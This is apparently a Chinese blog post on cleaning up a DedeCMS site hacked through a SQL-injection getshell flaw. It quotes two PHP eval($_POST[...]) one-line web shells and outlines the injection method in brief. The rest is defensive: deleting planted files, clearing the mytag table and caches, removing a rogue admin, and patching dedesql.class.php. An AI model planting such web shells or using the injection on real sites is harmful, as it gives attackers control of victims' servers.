1.先说说是什么木马或者挂木马的大鸟的方法（个人研究大概觉得吧）
内容分别为：<?php eval($_POST[guige]);?>，<?php eval($_POST[fuwu]);?> 应该是鬼哥这位大鸟发现漏洞的吧。
方法就是利用sql方法getshell，使得sql增加表mytag的内容
原因： 用的语句是update很多站 mytag 里面都没内容。那么你用update 那有什么用 修改不了任何数据。只能用 INSERT 当然，语句带#就会暴错误。。现在要做的饶过即可.
至于手段，我就不明说了。

2.重点是如何来解决或者防患于未然。
（1）首先检查根目录是否有asdd.php 文件如果有 就删除
（2）删除plus下的90sec.php，service.php，vliw.php，vuew.php，digg.php，xiao.php，bakup.php等可疑文件。
（3）查看download.php，mytag_js.php文件最近修改日期，如果是最新时间，那么进去修改把挂的黑链都删除。
（4）如果遇到织梦程序后台plus/90sec.php的文件，得每天删除，可是删除了，第二天就又出现了，那么主要操作是（后台->模板->自定义宏标记中删除其中的条目，并且修复include/dedesql.class.php文件）———-这步重要

(5) 给plus合理的权限，数据化表现是555权限 通过ftp 如下图，通过代码如chmod -R 555 xxxx.com/plus

（6）删除data/cache/mytag-9013.htm 这种类型的所有htm文件，删除tplcache的缓存文件。发现的越来越多了
（7）如果后天多出来一个管理员，那么删除增加的管理员：service
（8）数据库要清空dede_mytag表
（9）临时补丁:不知道别的地方还有没有覆盖变量 反正这个漏洞是修复的——————————————-重点找到include/dedesql.class.php–注释那句话

if(isset($GLOBALS['arrs1']))

1. {
2. $v1 = $v2 = ”;
3. for($i=0;isset($arrs1[$i]);$i++)
   {
   $v1 .= chr($arrs1[$i]);
   }
   for($i=0;isset($arrs2[$i]);$i++)
   {
   // $v2 .= chr($arrs2[$i]);//注释这里
   }
   $GLOBALS[$v1] .= $v2;
   }

（10）用织梦漏洞检测修复工具-重新检测以前存在的漏洞。（附件免费下载–使用前还是备份数据库以防误杀）